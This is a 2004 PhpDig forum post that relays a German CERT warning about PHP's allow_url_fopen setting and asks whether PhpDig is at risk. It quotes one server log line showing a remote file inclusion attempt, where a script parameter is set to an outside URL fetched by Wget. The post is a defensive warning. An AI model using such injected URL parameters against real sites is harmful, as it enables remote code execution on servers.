PhpDig.net
Download - PHP Reference - Links - Demo 1.8.9 RC1 - API
License - Credits - Copying - Changelog - Documentation

Go Back   PhpDig.net > PhpDig Forums > Troubleshooting
Reload this Page Security Risk: allow_url_fopen = ON
Register FAQ Calendar

Reply
 
Thread Tools
Old 10-07-2004, 08:32 AM   #1
Rolandks
Purple Mole
 
Rolandks's Avatar
 
Join Date: Sep 2003
Location: Kassel, Germany
Posts: 119
Exclamation Security Risk: allow_url_fopen = ON
The German CERTs (Computer Emergency Response Teams) reports a Security Risk if in php.ini: allow_url_fopen = ON.
Scripts who allow to load URL as parameter can use as attack. Many attacks started last weeks to all servers.

In log-Files you found f. ex.:
[28/Sep/2004:18:03:07 +0200] "GET
/path/to/script.php?variablenname=http://192.168.1.2:4213/ HTTP/1.0" 200 15183 "-" "Wget/1.8.1"

Link to message for German User:
http://www.heise.de/security/news/meldung/51838

Any secure risk for phpdig ?

Roland
Rolandks is offline   Reply With Quote
Reply

« Previous Thread | Next Thread »

Posting Rules
You may not post new threads
You may not post replies
You may not post attachments
You may not edit your posts
BB code is On
Smilies are On
[IMG] code is Off
HTML code is Off
Forum Jump

Similar Threads
Thread Thread Starter Forum Replies Last Post
allow_url_fopen not supported vuurvos Script Installation 1 10-05-2005 07:56 AM
Security issues Niele How-to Forum 1 04-25-2005 10:52 AM
allow_url_fopen question cefiro How-to Forum 3 02-21-2005 02:14 PM
got hacket, how? security hole? Killersushi Troubleshooting 2 07-12-2004 08:45 PM
security rom How-to Forum 1 02-28-2004 04:21 PM


All times are GMT -8. The time now is 10:56 AM.

PhpDig.net - Archive - Top

Powered by vBulletin® Version 3.7.3
Copyright ©2000 - 2024, Jelsoft Enterprises Ltd.
Copyright © 2001 - 2005, ThinkDing LLC. All Rights Reserved.